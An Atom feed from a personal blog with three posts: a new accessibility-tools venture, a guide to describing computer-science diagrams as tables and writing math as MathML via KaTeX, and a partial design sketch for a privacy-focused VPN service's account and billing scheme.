|
|
<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.2.0">Jekyll</generator><link href="/feed.xml" rel="self" type="application/atom+xml" /><link href="/" rel="alternate" type="text/html" /><updated>2021-12-07T09:31:35-07:00</updated><id>/feed.xml</id><entry><title type="html">New Company</title><link href="/2021/11/30/new-company/" rel="alternate" type="text/html" title="New Company" /><published>2021-11-30T00:00:00-07:00</published><updated>2021-11-30T00:00:00-07:00</updated><id>/2021/11/30/new-company</id><content type="html" xml:base="/2021/11/30/new-company/"><p>In my accidental quest to create accessible diagrams to a computer science student I have been contracting for,
|
|
|
I found in the post-secondary field a massive lack of care given to the topic of accessible diagrams,
|
|
|
even when they are relatively easy to create.
|
|
|
For example, a binary tree, or any tree structure actually has <a href="https://www.w3.org/WAI/GL/wiki/Using_ARIA_trees">native <code class="language-plaintext highlighter-rouge">aria-role</code> attributes</a> to alert a screen reader to the presence of a tree object.
|
|
|
A tree is only a list of lists after all.</p>
|
|
|
|
|
|
<h2 id="what-im-doing-now">What I’m Doing Now</h2>
|
|
|
|
|
|
<p>Although I sort of thought my career was going in a different direction after starting a full-time job in August,
|
|
|
I think I’m the right guy to create a good system for this.
|
|
|
I will be using my existing company <a href="https://bytetools.ca/">Bytetools</a> to create and sell these tools to universities.
|
|
|
It will be all open-source (GPLv3), but access to a website that I maintain for an institution will cost a bunch of money that only a university can afford.</p>
|
|
|
|
|
|
<p>Side note: This is how to make money with open source:
|
|
|
Create the software (free and libre), then host the software for a monthly fee.
|
|
|
<a href="https://www.invoiceninja.com/">Invoice Ninja</a> uses this strategy, and I think it strikes the appropriate balance between the need to live off of something you care about and creating free and open-source software.
|
|
|
For the <em>vast</em> majority of people it makes more sense for them to purchase a subscription to your site than to find someone who can setup a website for them alone.</p>
|
|
|
|
|
|
<p>So, here goes nothing…</p></content><author><name></name></author><summary type="html">In my accidental quest to create accessible diagrams to a computer science student I have been contracting for, I found in the post-secondary field a massive lack of care given to the topic of accessible diagrams, even when they are relatively easy to create. For example, a binary tree, or any tree structure actually has native aria-role attributes to alert a screen reader to the presence of a tree object. A tree is only a list of lists after all.</summary></entry><entry><title type="html">How To Produce Semantically Correct MathML From XaTeX/LaTeX (and other accessibility ideas)</title><link href="/2021/09/18/how-to-generate-proper-content-mathml-from-katex-or-latex/" rel="alternate" type="text/html" title="How To Produce Semantically Correct MathML From XaTeX/LaTeX (and other accessibility ideas)" /><published>2021-09-18T00:00:00-06:00</published><updated>2021-09-18T00:00:00-06:00</updated><id>/2021/09/18/how-to-generate-proper-content-mathml-from-katex-or-latex</id><content type="html" xml:base="/2021/09/18/how-to-generate-proper-content-mathml-from-katex-or-latex/"><p>During a recent run-in with the Simon Fraser Fraser University accessibility department,
|
|
|
I learned that they’re writers are so well-trained as to write “image” where a simple diagram is shown,
|
|
|
and “print out picture of output” where a piece of code lies.
|
|
|
I figure the geniuses over there could use some help creating files for the visually impaired.
|
|
|
Here’s a quick guide!</p>
|
|
|
|
|
|
<h2 id="diagrams">Diagrams</h2>
|
|
|
|
|
|
<p>Most unexplained diagrams I saw were ones which mirrored classic computer-science imagery;
|
|
|
these diagrams, for the most part, were not complex nor exotic;
|
|
|
they are straight-forward to explain in writing,
|
|
|
or easy to turn into a table.
|
|
|
I’ll show two examples here,
|
|
|
one will show a visual aide in relation to stacks and queues,
|
|
|
and the other will show a memory representation of a stack.
|
|
|
Both of these were explained as “image” to the student.</p>
|
|
|
|
|
|
<h2 id="stacks">Stacks</h2>
|
|
|
|
|
|
<p>Diagram 1:</p>
|
|
|
|
|
|
<figure>
|
|
|
<img src="/assets/img/access1/stack.png" alt="image...lol! Just kidding, will explain it below w/ table" />
|
|
|
<figcaption>Simple diagram explaining the push/pop process. Source: <a href="https://stackoverflow.com/questions/32151392/stacks-queues-and-linked-lists">Stackoverflow</a></figcaption>
|
|
|
</figure>
|
|
|
|
|
|
<p>Ok, so here we have a diagram showing the pushing and popping process of a stack.
|
|
|
Now, “image” is hardly sufficient to explain this, so let’s try it with text.
|
|
|
I won’t finish it because it gets unwieldy very fast:</p>
|
|
|
|
|
|
<blockquote>
|
|
|
<p>A diagram showing a stack. It starts with the operation “Push A”, and now the stack contains the variable “A”; now the stack pushes “B”, which displays now “B” on top of “A”…</p>
|
|
|
</blockquote>
|
|
|
|
|
|
<p>This is no solution.
|
|
|
It is hard to explain this correctly and accurately without being extremely verbose and frankly, confusing—this defeats the whole purpose of describing the image.
|
|
|
The good news, is that computer science diagrams especially tend to lean towards being tabular data.
|
|
|
Now to be clear, something does not need to look like a table to be tabular data;
|
|
|
this image happens to look almost like a table if you squinted hard enough,
|
|
|
but many data not written down in a table, are still “tabular data”.
|
|
|
I will show an example of that next!
|
|
|
For now though, here is the same idea, same data without words:</p>
|
|
|
|
|
|
<table>
|
|
|
<thead>
|
|
|
<tr>
|
|
|
<th>Operator</th>
|
|
|
<th>Stack Values</th>
|
|
|
</tr>
|
|
|
</thead>
|
|
|
<tbody>
|
|
|
<tr>
|
|
|
<td>Push A</td>
|
|
|
<td>[A]</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>Push B</td>
|
|
|
<td>[B, A]</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>Push C</td>
|
|
|
<td>[C, B, A]</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>Push D</td>
|
|
|
<td>[D, C, B, A]</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>Pop D</td>
|
|
|
<td>[C, B, A]</td>
|
|
|
</tr>
|
|
|
</tbody>
|
|
|
</table>
|
|
|
|
|
|
<p>Now this diagram does imply you can pop other items, like “Pop A”, which is just not true.
|
|
|
But that’s the fault of the diagram, not the representation of it.</p>
|
|
|
|
|
|
<p>Here is the raw text equivalent (in Markdown):</p>
|
|
|
|
|
|
<pre>
|
|
|
Operator|Stack Values
|
|
|
---|---
|
|
|
Push A|[A]
|
|
|
Push B|{B, A]
|
|
|
Push C|[C, B, A]
|
|
|
Push D|[D, C, B, A]
|
|
|
Pop (D)|[C, B, A]
|
|
|
</pre>
|
|
|
|
|
|
<h2 id="stacks-in-memory">Stacks in Memory</h2>
|
|
|
|
|
|
<p>So I couldn’t find a good non-copyright image of a stack in memory, but I’ll write it down here in plain text, and you should get the idea.
|
|
|
Now again, remember this is still labeled “image” to the student,
|
|
|
they do not have access to a text version of this.</p>
|
|
|
|
|
|
<pre>
|
|
|
( ) ( ( ( ) ) ) ( ) ( ( ) ( ( )
|
|
|
1 0 1 2 3 2 1 0 1 0 1 2 1 2 3 2
|
|
|
</pre>
|
|
|
|
|
|
<p>Now, someone who looks at this can probably see that the number goes up for a left parenthesis, and down for a right parenthesis.
|
|
|
“Image”, however, does not handle the detail.
|
|
|
The issue here is a transcriber is likely to want to transcribe this as <em>text</em>.
|
|
|
But it’s really not.
|
|
|
This is again, tabular data, which is best represented in a table.</p>
|
|
|
|
|
|
<p>Table of this:</p>
|
|
|
|
|
|
<table>
|
|
|
<thead>
|
|
|
<tr>
|
|
|
<th>Character</th>
|
|
|
<th>Counter</th>
|
|
|
</tr>
|
|
|
</thead>
|
|
|
<tbody>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>0</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>2</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>3</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>2</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>0</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>0</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>2</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>1</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>2</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>(</td>
|
|
|
<td>3</td>
|
|
|
</tr>
|
|
|
<tr>
|
|
|
<td>)</td>
|
|
|
<td>2</td>
|
|
|
</tr>
|
|
|
</tbody>
|
|
|
</table>
|
|
|
|
|
|
<p>Raw text in markdown:</p>
|
|
|
|
|
|
<pre>
|
|
|
Character|Counter
|
|
|
---|---
|
|
|
(|1
|
|
|
)|0
|
|
|
(|1
|
|
|
(|2
|
|
|
(|3
|
|
|
)|2
|
|
|
)|1
|
|
|
)|0
|
|
|
(|1
|
|
|
)|0
|
|
|
(|1
|
|
|
(|2
|
|
|
)|1
|
|
|
(|2
|
|
|
(|3
|
|
|
)|2
|
|
|
</pre>
|
|
|
|
|
|
<p>Insanely simple!
|
|
|
Look for clues of tabular data.
|
|
|
Things which have a one to one correspondence of any kind can usually be represented as a table, even if it’s only “aligned” on the slide or note.</p>
|
|
|
|
|
|
<h2 id="math-expressions--mathml">Math Expressions &amp; MathML</h2>
|
|
|
|
|
|
<p>Here is a more complex example:
|
|
|
using math within a presentation.</p>
|
|
|
|
|
|
<p>Let’s take for example the mathematical expression <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>16</mn><mo>=</mo><msup><mn>2</mn><mn>4</mn></msup></mrow><annotation encoding="application/x-tex">16 = 2^{4}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">16</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.8141079999999999em;vertical-align:0em;"></span><span class="mord"><span class="mord">2</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">4</span></span></span></span></span></span></span></span></span></span></span></span>. This is a very simple math expression that completely breaks in some cases.
|
|
|
When converting some math expressions to text, it will convert that expression as <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>16</mn><mo>=</mo><mn>24</mn></mrow><annotation encoding="application/x-tex">16 = 24</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">16</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">24</span></span></span></span>, erasing the superscript to denote the exponent.</p>
|
|
|
|
|
|
<p>This gets even worse with large mathematical expressions like this:</p>
|
|
|
|
|
|
<p><span class="katex-display"><span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mtext>B2U</mtext><mo stretchy="false">(</mo><mi>X</mi><mo stretchy="false">)</mo><mo>=</mo><munderover><mo>∑</mo><mrow><mi>i</mi><mo>=</mo><mn>0</mn></mrow><mrow><mi>w</mi><mo>−</mo><mn>1</mn></mrow></munderover><msub><mi>x</mi><mi>i</mi></msub><mo>×</mo><msup><mn>2</mn><mi>i</mi></msup></mrow><annotation encoding="application/x-tex">
|
|
|
\text{B2U}(X) = \sum_{i=0}^{w-1} x_{i} \times 2^{i}
|
|
|
</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1em;vertical-align:-0.25em;"></span><span class="mord text"><span class="mord">B2U</span></span><span class="mopen">(</span><span class="mord mathdefault" style="margin-right:0.07847em;">X</span><span class="mclose">)</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:3.0787820000000004em;vertical-align:-1.277669em;"></span><span class="mop op-limits"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:1.8011130000000004em;"><span style="top:-1.872331em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathdefault mtight">i</span><span class="mrel mtight">=</span><span class="mord mtight">0</span></span></span></span><span style="top:-3.050005em;"><span class="pstrut" style="height:3.05em;"></span><span><span class="mop op-symbol large-op">∑</span></span></span><span style="top:-4.300005em;margin-left:0em;"><span class="pstrut" style="height:3.05em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathdefault mtight" style="margin-right:0.02691em;">w</span><span class="mbin mtight">−</span><span class="mord mtight">1</span></span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:1.277669em;"><span></span></span></span></span></span><span class="mspace" style="margin-right:0.16666666666666666em;"></span><span class="mord"><span class="mord mathdefault">x</span><span class="msupsub"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.31166399999999994em;"><span style="top:-2.5500000000000003em;margin-left:0em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathdefault mtight">i</span></span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.15em;"><span></span></span></span></span></span></span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.8746639999999999em;vertical-align:0em;"></span><span class="mord"><span class="mord">2</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8746639999999999em;"><span style="top:-3.113em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mathdefault mtight">i</span></span></span></span></span></span></span></span></span></span></span></span></span></p>
|
|
|
|
|
|
<p>Here is what I get by extracting the text from the PDF:</p>
|
|
|
|
|
|
<pre>
|
|
|
B2U(X ) =
|
|
|
|
|
|
w-1
|
|
|
|
|
|
Σ xi •2
|
|
|
i=0
|
|
|
|
|
|
i
|
|
|
</pre>
|
|
|
|
|
|
<p>And this is generous, as the sigma sign, bullet point, equal sign and minus sign were for some reason not UTF-8 encoded so it displayed as a chat sign emoji, down arrow, video camera and book sign respectively.
|
|
|
Not sure about you, but I certainly can’t get the equation out of that mess.</p>
|
|
|
|
|
|
<p>These can be written in LaTeX, then converted to MathML (an accessible math format) using <a href="https://katex.org">KaTeX</a>.
|
|
|
Here’s an example of what to write to product the function above:</p>
|
|
|
|
|
|
<pre>
|
|
|
\text{B2U}(X) = \sum_{i=0}^{w-1} x_{i} \times 2^{i}
|
|
|
</pre>
|
|
|
|
|
|
<p>For someone who is doing transcription as a <em>job</em> for visually impaired students,
|
|
|
I would go so far as to say to learn this is a necessity.</p>
|
|
|
|
|
|
<ol>
|
|
|
<li>It’s not difficult. You can learn the vast majority of LaTeX math syntax in an afternoon.</li>
|
|
|
<li>It’s easier for <em>everyone</em> to read. Especially with KaTeX. KaTeX is able to convert the formula to both MathML for screenreader users and HTML markup for people who just want to see those fancy math expressions.</li>
|
|
|
</ol>
|
|
|
|
|
|
<p>Likely, the teacher is already using some LaTeX derivative to create the math in the first place,
|
|
|
they might as well use a program like KaTeX, MathJax or likewise to convert it to MathML.</p>
|
|
|
|
|
|
<h2 id="code--output">Code &amp; Output</h2>
|
|
|
|
|
|
<p>How did it even happen that entire programs and outputs were just ignored with the label “picture of output” is beyond me.
|
|
|
Everything should be transcribed.
|
|
|
Whoever transcribed that document should be fired.</p>
|
|
|
|
|
|
<h2 id="conclusion">Conclusion</h2>
|
|
|
|
|
|
<p>To teachers:</p>
|
|
|
|
|
|
<p>Presenting information in plain text, or at least having alternates forms of images, diagrams and math formulas makes education better for everyone, not just blind students.
|
|
|
It makes it better for people running on cheaper devices which may not handle running heavy software like Microsoft PowerPoint;
|
|
|
it makes it better for people who use operating systems other than MacOS and Windows (this is especially important in the technology sector, where Linux/BSD users make up a sizeable minority of users);
|
|
|
and finally, it makes it easier to search through the content of all notes at once using simple text-manipulation tools.</p>
|
|
|
|
|
|
<p>To accessibility departments:</p>
|
|
|
|
|
|
<p>Running a <code class="language-plaintext highlighter-rouge">pdftotext</code> program, or simply transcribing handwritten notes is not enough to properly describe slides and notes—handwritten or not.
|
|
|
Every diagram, math equation, annotation, piece of code or output—every single thing must be transcribed to plain text, or some alternate format like MathML.</p>
|
|
|
|
|
|
<p>I find it sad that a student (with their own full-time job) can product better work than someone who has this job exclusively at a major university.
|
|
|
Perhaps I am mistaken and the university has volunteers do this work.
|
|
|
In that case I guess you can’t ask for too much, but somehow I feel like this is probably not the case.</p>
|
|
|
|
|
|
<p>Big sad.</p></content><author><name></name></author><summary type="html">During a recent run-in with the Simon Fraser Fraser University accessibility department, I learned that they’re writers are so well-trained as to write “image” where a simple diagram is shown, and “print out picture of output” where a piece of code lies. I figure the geniuses over there could use some help creating files for the visually impaired. Here’s a quick guide!</summary></entry><entry><title type="html">Idea For A VPN Service</title><link href="/2021/08/31/vpns-api/" rel="alternate" type="text/html" title="Idea For A VPN Service" /><published>2021-08-31T00:00:00-06:00</published><updated>2021-08-31T00:00:00-06:00</updated><id>/2021/08/31/vpns-api</id><content type="html" xml:base="/2021/08/31/vpns-api/"><p>Recently I’ve been thinking about starting a VPN service.
|
|
|
This service has some interesting requirements that I have never seen a VPN service do before, so I’d like to put down my thoughts as to what might be sensible for a centralized yet encrypted* VPN service.</p>
|
|
|
|
|
|
<p>I would license all the code and scripts under the AGPLv3.
|
|
|
This creates an environment where I could allow my company to use this code, and any other company for that matter. However, no company would be allowed to take it into their own hands and use it without contributing back to the project.</p>
|
|
|
|
|
|
<h2 id="e2ee-vpn">E2EE VPN</h2>
|
|
|
|
|
|
<p>I want this service in many ways to be on par with <a href="https://protonmail.com">ProtonMail</a>:
|
|
|
end-to-end encrypted (E2EE), and with a focus in data security for the user of the service.</p>
|
|
|
|
|
|
<p>Full encryption, so that even me, the writer and the deployer of the service, cannot view any information about the user: this is the utmost security.
|
|
|
The bad news is that this is very hard to do in a convenient way.
|
|
|
I’ve decided for now that the best thing to do is to target the Linux nerd.
|
|
|
Target the user who is familiar with these advanced security practices, then make them available to the general public as the layers on top of the robust security are refined.</p>
|
|
|
|
|
|
<h2 id="why">Why?</h2>
|
|
|
|
|
|
<p>End-to-end encryption is necessary in a country like Canada, where I may be sent a subpoena to provide customer data.
|
|
|
This is the case especially in the <a href="https://en.wikipedia.org/wiki/Five_Eyes">Five Eyes</a> anglophone group of countries, who essentially spy on each others’ citizens for eachother.
|
|
|
In essence, any data in the hand of one government agency in the “Eyes Countries” may be shared between the Five, Nine, and 14 Eyes countries.</p>
|
|
|
|
|
|
<p>I am not against government surveillance <em>in principle</em>.
|
|
|
In theory, the government should be finding bad guys: pedophiles, sex trafficking rings and drug cartels.
|
|
|
In practice, the U.S. government especially, uses its authority to spy on its own citizens who are simply minding their own business. <del>Bulk data collection</del> mass surveillance is not a freedom respecting characteristic of modern western democracies.
|
|
|
I do run the risk of not being able to help much in the case of a genuine warrant against a genuine, evil criminal.
|
|
|
That is the risk of privacy.</p>
|
|
|
|
|
|
<p>That said, let’s see what can be built that can do these 2 things:</p>
|
|
|
<ol>
|
|
|
<li>Maximize privacy for the user.</li>
|
|
|
<li>Allow for (optional) monetization, depending on the provider. This is in some contradiction to premise 1.</li>
|
|
|
</ol>
|
|
|
|
|
|
<h2 id="what-we-need">What We Need</h2>
|
|
|
|
|
|
<p>A VPN service needs access to some basic information:</p>
|
|
|
<ol>
|
|
|
<li>Service discontinue time (the amount of time until the customer must renew).</li>
|
|
|
<li>Active connections (a number which can not be exceeded by an individual user).</li>
|
|
|
</ol>
|
|
|
|
|
|
<p>The client needs access to some information from the server as well:</p>
|
|
|
<ol>
|
|
|
<li>A list of VPNs able to be connected to (with filters).</li>
|
|
|
<li>For every VPN:
|
|
|
<ol>
|
|
|
<li>IP Address.</li>
|
|
|
<li>Maximum bandwidth.</li>
|
|
|
<li>Number of connected users or connection saturation percentage.</li>
|
|
|
<li>Supported protocols.</li>
|
|
|
</ol>
|
|
|
</li>
|
|
|
</ol>
|
|
|
|
|
|
<p>Can we do this in a end-to-end encrypted fashion?
|
|
|
I’m honestly not sure. But here are my ideas so far as to how <em>some</em> of these functions might work.</p>
|
|
|
|
|
|
<h2 id="how-to-do-it">How To Do It</h2>
|
|
|
|
|
|
<h3 id="usernames">“Usernames”</h3>
|
|
|
|
|
|
<p>There will be one button to create your account: <em>“Generate username”</em>
|
|
|
The username, or unique identifier for a user will be generated for them by a random generator.
|
|
|
I plan to generate a username from a list of <a href="https://en.wikipedia.org/wiki/Base64">Base 64</a> characters; it will be a guaranteed length of 16.
|
|
|
This gives a total of: <code class="language-plaintext highlighter-rouge">79228162514264337593543950336</code> or <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mn>7.9</mn><mo>×</mo><mn>1</mn><msup><mn>0</mn><mn>28</mn></msup></mrow><annotation encoding="application/x-tex">7.9 \times 10^{28}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:0.72777em;vertical-align:-0.08333em;"></span><span class="mord">7</span><span class="mord">.</span><span class="mord">9</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span><span class="mbin">×</span><span class="mspace" style="margin-right:0.2222222222222222em;"></span></span><span class="base"><span class="strut" style="height:0.8141079999999999em;vertical-align:0em;"></span><span class="mord">1</span><span class="mord"><span class="mord">0</span><span class="msupsub"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8141079999999999em;"><span style="top:-3.063em;margin-right:0.05em;"><span class="pstrut" style="height:2.7em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">2</span><span class="mord mtight">8</span></span></span></span></span></span></span></span></span></span></span></span> posibilities.
|
|
|
This is sufficient for a username.</p>
|
|
|
|
|
|
<p>The other option is to use a standard “username” field that uses a modern hash function like <a href="https://en.wikipedia.org/wiki/Secure_Hash_Algorithms">SHA512</a> to store it in the database.
|
|
|
This is less secure as it is vulnerable to a brute-force attack of finding users,
|
|
|
but this is also a very easy attack to defend against, i.e. IP banning after 10-ish tries of not finding a username.</p>
|
|
|
|
|
|
<p>A <em>non-unique, universal</em> <a href="https://en.wikipedia.org/wiki/Salt_(cryptography)">salt</a> will also be used on each username before storing it in the database to make it more secure.
|
|
|
This decreases the possibility of an advanced attacker being able to find usernames in a leaked database using <a href="https://en.wikipedia.org/wiki/Rainbow_table">rainbow tables</a>.
|
|
|
That said, the fact that it is a fixed salt makes it much more vulnerable to an attack.
|
|
|
Although it would be known only by the server machine, it would still be somewhat of a vulnerability.
|
|
|
The operator may also store the salt in an encrypted password store of their own in case the server is erased, broken into, etc.
|
|
|
It would be fairly easy, if they have access to the active salt, to migrate to a new salt every few days/months, or perhaps every time a server upgrade/maintenance happens.
|
|
|
This does run the possibility of larger issues if the server is shut down or hangs during a migration and needs to be restarted.
|
|
|
Many users may end up with accounts they cannot access without manual cleanup.</p>
|
|
|
|
|
|
<p>In the end, the <em>application</em> would need a backup of this salt, otherwise login times would become linear to the number of users as the database checks every user’s salt to see if it matches the hash made with the username input.
|
|
|
Note that the <em>database</em> does not store the salt, so finding it will be very hard, even in the case of a leaked database.</p>
|
|
|
|
|
|
<p>So, here’s the overview:
|
|
|
The username will be generated, then stored <em>after</em> being salted and hashed.
|
|
|
The salt will be a fixed or rolling salt across all usernames to avoid linear scaling of searching for a user.
|
|
|
The server will only see the username once, when sending it to the user for them to save for the first time;
|
|
|
there will be no database entry with the original username in it.</p>
|
|
|
|
|
|
<p>This does mean that if the username is lost, the account is lost too. There is no way to recover the account.
|
|
|
Again, this is ok for now, as my target audience is advanced Linux and privacy enthusiasts.</p>
|
|
|
|
|
|
<h3 id="passwords">“Passwords”</h3>
|
|
|
|
|
|
<p>There are a few options for passwords/secret keys.</p>
|
|
|
|
|
|
<p>I think the best is to treat it similarly to the username is above, except it will <em>not</em> be generated for you.
|
|
|
When a new account is generated, you will be taken to a password reset screen where you will set your password to whatever your want, using your own secure system to handle it.
|
|
|
This is ideal for Linux and tech enthusiasts as they generally already have a password management system setup.</p>
|
|
|
|
|
|
<p>This will also be salted, with its own unique salt, then hashed and stored alongside the username.</p>
|
|
|
|
|
|
<h3 id="active-time-remaining">Active Time Remaining</h3>
|
|
|
|
|
|
<p>It is easy and ideal to have a field connected to a user with their expiry date for their account.
|
|
|
When a payment is made, this date will be increased by the number of days, hours and minutes proportional to the payment received.</p>
|
|
|
|
|
|
<p>For example: if a “month” (30 days) costs ten dollars, then a payment of fifteen dollars would add 45 days to an account. So essentially 33 cents per day, <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mfrac><mn>10</mn><mrow><mn>30</mn><mo>×</mo><mn>24</mn></mrow></mfrac><mo>=</mo><mn>0.0138</mn></mrow><annotation encoding="application/x-tex"> \frac{10}{30 \times 24}=0.0138</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.2484389999999999em;vertical-align:-0.403331em;"></span><span class="mord"><span class="mopen nulldelimiter"></span><span class="mfrac"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.845108em;"><span style="top:-2.655em;"><span class="pstrut" style="height:3em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">3</span><span class="mord mtight">0</span><span class="mbin mtight">×</span><span class="mord mtight">2</span><span class="mord mtight">4</span></span></span></span><span style="top:-3.23em;"><span class="pstrut" style="height:3em;"></span><span class="frac-line" style="border-bottom-width:0.04em;"></span></span><span style="top:-3.394em;"><span class="pstrut" style="height:3em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">1</span><span class="mord mtight">0</span></span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.403331em;"><span></span></span></span></span></span><span class="mclose nulldelimiter"></span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.64444em;vertical-align:0em;"></span><span class="mord">0</span><span class="mord">.</span><span class="mord">0</span><span class="mord">1</span><span class="mord">3</span><span class="mord">8</span></span></span></span> dollars per hour, or <span class="katex"><span class="katex-mathml"><math xmlns="http://www.w3.org/1998/Math/MathML"><semantics><mrow><mfrac><mn>10</mn><mrow><mn>30</mn><mo>×</mo><mn>24</mn><mo>×</mo><mn>60</mn></mrow></mfrac><mo>=</mo><mn>0.00023</mn><mover accent="true"><mn>148</mn><mo stretchy="true">‾</mo></mover></mrow><annotation encoding="application/x-tex">\frac{10}{30 \times 24 \times 60}=0.00023\overline{148}</annotation></semantics></math></span><span class="katex-html" aria-hidden="true"><span class="base"><span class="strut" style="height:1.2484389999999999em;vertical-align:-0.403331em;"></span><span class="mord"><span class="mopen nulldelimiter"></span><span class="mfrac"><span class="vlist-t vlist-t2"><span class="vlist-r"><span class="vlist" style="height:0.845108em;"><span style="top:-2.655em;"><span class="pstrut" style="height:3em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">3</span><span class="mord mtight">0</span><span class="mbin mtight">×</span><span class="mord mtight">2</span><span class="mord mtight">4</span><span class="mbin mtight">×</span><span class="mord mtight">6</span><span class="mord mtight">0</span></span></span></span><span style="top:-3.23em;"><span class="pstrut" style="height:3em;"></span><span class="frac-line" style="border-bottom-width:0.04em;"></span></span><span style="top:-3.394em;"><span class="pstrut" style="height:3em;"></span><span class="sizing reset-size6 size3 mtight"><span class="mord mtight"><span class="mord mtight">1</span><span class="mord mtight">0</span></span></span></span></span><span class="vlist-s"></span></span><span class="vlist-r"><span class="vlist" style="height:0.403331em;"><span></span></span></span></span></span><span class="mclose nulldelimiter"></span></span><span class="mspace" style="margin-right:0.2777777777777778em;"></span><span class="mrel">=</span><span class="mspace" style="margin-right:0.2777777777777778em;"></span></span><span class="base"><span class="strut" style="height:0.8444400000000001em;vertical-align:0em;"></span><span class="mord">0</span><span class="mord">.</span><span class="mord">0</span><span class="mord">0</span><span class="mord">0</span><span class="mord">2</span><span class="mord">3</span><span class="mord overline"><span class="vlist-t"><span class="vlist-r"><span class="vlist" style="height:0.8444400000000001em;"><span style="top:-3em;"><span class="pstrut" style="height:3em;"></span><span class="mord"><span class="mord">1</span><span class="mord">4</span><span class="mord">8</span></span></span><span style="top:-3.76444em;"><span class="pstrut" style="height:3em;"></span><span class="overline-line" style="border-bottom-width:0.04em;"></span></span></span></span></span></span></span></span></span> dollars per minute.
|
|
|
